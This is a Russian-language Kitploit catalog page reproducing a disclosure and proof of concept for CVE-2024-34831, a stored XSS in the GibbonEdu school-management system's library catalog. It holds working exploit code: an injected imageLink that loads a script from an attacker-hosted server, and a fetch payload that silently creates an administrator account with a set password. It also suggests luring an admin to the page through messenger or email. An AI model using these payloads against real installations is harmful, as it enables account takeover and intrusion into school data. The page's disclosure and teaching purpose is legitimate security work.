Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-34831 — Раскрытие CVE-2024-34831 | Kitploit
Инструменты/GitHubGitHub/enzored/cve-2024-34831
Повышение привилегийАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubenzored/cve-2024-34831

CVE-2024-34831

Раскрытие CVE-2024-34831

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-34831 XSS-уязвимость в GibbonEdu Core v26.0.00, приводящая к повышению привилегий

Gibbon — это отличная полнофункциональная открытая система управления школой. Большие усилия прилагаются для модернизации довольно старой кодовой базы.

Автор: Christian Bajada

1. Уязвимость

Параметр imageLink при редактировании/отправке новых книг (/modules/Library/library_manage_catalog_editProcess.php) подвержен XSS. Пользователи с разрешением Manage Catalog могут эксплуатировать эту уязвимость, вызывая выполнение произвольных скриптов для пользователей с более высокими привилегиями и повышая свои привилегии.

2. PoC — Простой сценарий

  1. Перейдите в Learn > Library > Manage Catalog
  2. Отредактируйте один из элементов книги.
  3. Поле «Image Link» не очищается должным образом и позволяет выполнять произвольный JavaScript. Измените Image Link на [http://x](http://x/)" onerror='alert(1)' — код alert выполнится при загрузке страницы библиотеки:

Gibbon_XSS_1

Gibbon_XSS_1

3. PoC для повышения привилегий

В этом разделе объясняется, как эту уязвимость можно использовать для чего-то более опасного, чем просто всплывающее окно alert(1). Мы собираемся обмануть администратора, вошедшего в систему, чтобы он незаметно создал другого администратора, доступного атакующему.

Поле imageLink слишком мало, чтобы позволить нам вызывать какую-либо значимую функциональность на платформе Gibbon. Мы можем просто разместить JavaScript в другом месте и заставить браузер загрузить и выполнить его. Отсутствие CSP делает это возможным.

  1. Злоумышленник создает полезную нагрузку для создания администратора следующим образом и размещает ее в общедоступном месте, например https://<yourserver.com>/payload.js. Приведенный ниже код, если он выполняется администратором, создаст административного пользователя с именем hexthecat. Код вызывает функцию Gibbon Core для создания нового пользователя со всеми необходимыми параметрами.
root@kitploit:~
fetch('./modules/User%20Admin/user_manage_addProcess.php', { method: 'POST', body: new URLSearchParams({ title: 'Mr.', surname: 'Cat', firstName: 'Hex', preferredName: 'Hex', 'officialName' : 'Hex', gender: 'M', dob: '01/04/2024', gibbonRoleIDPrimary: '001', username: 'hexthecat', passwordNew: 'Hexed001', passwordConfirm: 'Hexed001', status: 'full', canLogin: 'Y', passwordForceReset: 'Y' }) });
  1. Злоумышленник с правом Manage Catalog вводит следующий imageLink для книги (сохраняя оригинал и добавляя часть загрузки скрипта):

http://books.google.com/books?id=SluXuAAACAAJ&printsec=frontcover&img=1&zoom=1&source=gbs_api" onmouseover="$.getScript('https://<yourserver.com>/payload.js')"

  1. Администратор просматривает библиотеку.

Вам нужно либо подождать, пока администратор перейдет в каталог библиотеки, либо убедить его с помощью мессенджера, электронной почты или любого другого канала.

Действие наведения мыши (onmouseover) на изображение книги приведет к получению полезной нагрузки из указанного места (в данном случае <yourserver.com>) и ее выполнению. В результате будет создан административный пользователь, к которому теперь может получить доступ злоумышленник. Слушатель 'onerror' также можно использовать для немедленного выполнения полезной нагрузки без необходимости наводить курсор на изображение.

Вы можете проверить созданного пользователя в меню ADMIN > User Admin

Gibbon_XSS_2

4. Ответственное раскрытие

Опубликовано в соответствии с рекомендациями по ответственному раскрытию https://github.com/GibbonEdu/core/security.

  • 06 мая 2024: Уязвимость сообщена и подтверждена мейнтейнером GibbonEdu.
  • 15 мая 2024: Назначен номер CVE организацией MITRE.
  • 10 сентября 2024: Опубликован совет.
Скачать инструмент